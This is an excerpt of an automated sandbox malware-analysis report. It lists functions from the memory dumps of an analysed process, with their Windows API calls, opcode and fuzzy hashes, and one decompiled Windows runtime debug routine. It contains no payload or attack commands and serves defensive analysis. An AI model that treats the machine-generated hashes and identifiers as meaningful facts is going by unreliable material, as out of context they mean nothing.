                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e49e0eecdc898293f0cf74605bbc8c53e6bee43a0a5fda52e2f8315f62d04465
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62316FB5A0060AAFCB00DFD8CC819EFB7B9FF88304B148959E515EB244D771AE01CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 00505220 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00505237
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                                                                                                                                                                                                • Opcode ID: 90e24068a74aef48ab4ed1c9ecd0598572355c525a96fb41cad1a835b1be5538
                                                                                                                                                                                                                                                                                                • Instruction ID: 9236a593400ec143c22733e4699ab067653bb5296724ac33e7f0b75f5eebade3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90e24068a74aef48ab4ed1c9ecd0598572355c525a96fb41cad1a835b1be5538
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 603150B5A0060AAFDB00DFD8C8809EFB7B9FF88304B108959E505EB244D771EE058BA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004FB160 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004FB1D2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6615669a7275e3c232b0cffa85c475ad9a521c389ee0800ae0415dec43c046a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E70112B5E0010EABDB10EAE4DD56FEEB778AB54308F0041A5AE0897281F635EB14C791
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050CA70 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0050CA9D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction ID: 95df83603d7bdeb34515c67282dafb31d184c19788c55eb750f5c0282dea9cc3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E01AB12002086BCB14DF89DC49EAB37ACAF88750F014454B90957281C670E910CAB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004FE590 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,004F8D9A,?), ref: 004FE5C1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 722c115f3bd7084106ab79a5ca0d4136209ca2286be3acf59629a06e3d9eed0c
                                                                                                                                                                                                                                                                                                • Instruction ID: 2697dbc098a4ff9b1e9865fbc56f2f5c9bbe55d2c4b8bae695ba5e72c2cbb830
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 722c115f3bd7084106ab79a5ca0d4136209ca2286be3acf59629a06e3d9eed0c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5D05E71B8420D7BF650A6E6DC07F6A368C9B48794F054055FA0CE72C2E855F5108169
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050CA64 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0050CA9D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction ID: 317754a297a0273873fa7a4ba7cc3638b53a62c90b591da0e71f778bfc340adc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E0C2B42087896FC704DF68D8408AB7FA4EF8A300B148A4DF8DA47642C230D829CBB0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0109967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e7b59a91347aac1e959d12d62319506f0aa6c9d21a2978405c1d238e8a70ea93
                                                                                                                                                                                                                                                                                                • Instruction ID: e916c4108128a425b09e695ce5a11a669f60918a7e7d4ec91e60baf5fed0dd51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7b59a91347aac1e959d12d62319506f0aa6c9d21a2978405c1d238e8a70ea93
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4B09B719014C5D5DB51D7E546087177A4077D4745F56C055D1420681B8778C091F6F5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 010EFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                			E010EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0109CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E010E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E010E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                                                                                                                                                                                0x010efdda
                                                                                                                                                                                                                                                                                                0x010efde2
                                                                                                                                                                                                                                                                                                0x010efde5
                                                                                                                                                                                                                                                                                                0x010efdec
                                                                                                                                                                                                                                                                                                0x010efdfa
                                                                                                                                                                                                                                                                                                0x010efdff
                                                                                                                                                                                                                                                                                                0x010efe0a
                                                                                                                                                                                                                                                                                                0x010efe0f
                                                                                                                                                                                                                                                                                                0x010efe17
                                                                                                                                                                                                                                                                                                0x010efe1e
                                                                                                                                                                                                                                                                                                0x010efe19
                                                                                                                                                                                                                                                                                                0x010efe19
                                                                                                                                                                                                                                                                                                0x010efe19
                                                                                                                                                                                                                                                                                                0x010efe20
                                                                                                                                                                                                                                                                                                0x010efe21
                                                                                                                                                                                                                                                                                                0x010efe22
                                                                                                                                                                                                                                                                                                0x010efe25
                                                                                                                                                                                                                                                                                                0x010efe40

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010EFDFA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010EFE01
                                                                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010EFE2B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                                                                                                                                                                                                • Opcode ID: 28695da2e791578d6929f8c86363c5c13691b093ae02a62cc1f2702e5c9797ff
                                                                                                                                                                                                                                                                                                • Instruction ID: 5f6342129ae9bd37123a1a5dfd511321daad1073cd88da7315abe03ef40c334b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28695da2e791578d6929f8c86363c5c13691b093ae02a62cc1f2702e5c9797ff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0FC76640102BFE6201A46DC05F637F9AEB44730F140314F694561E1D962F83096F4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%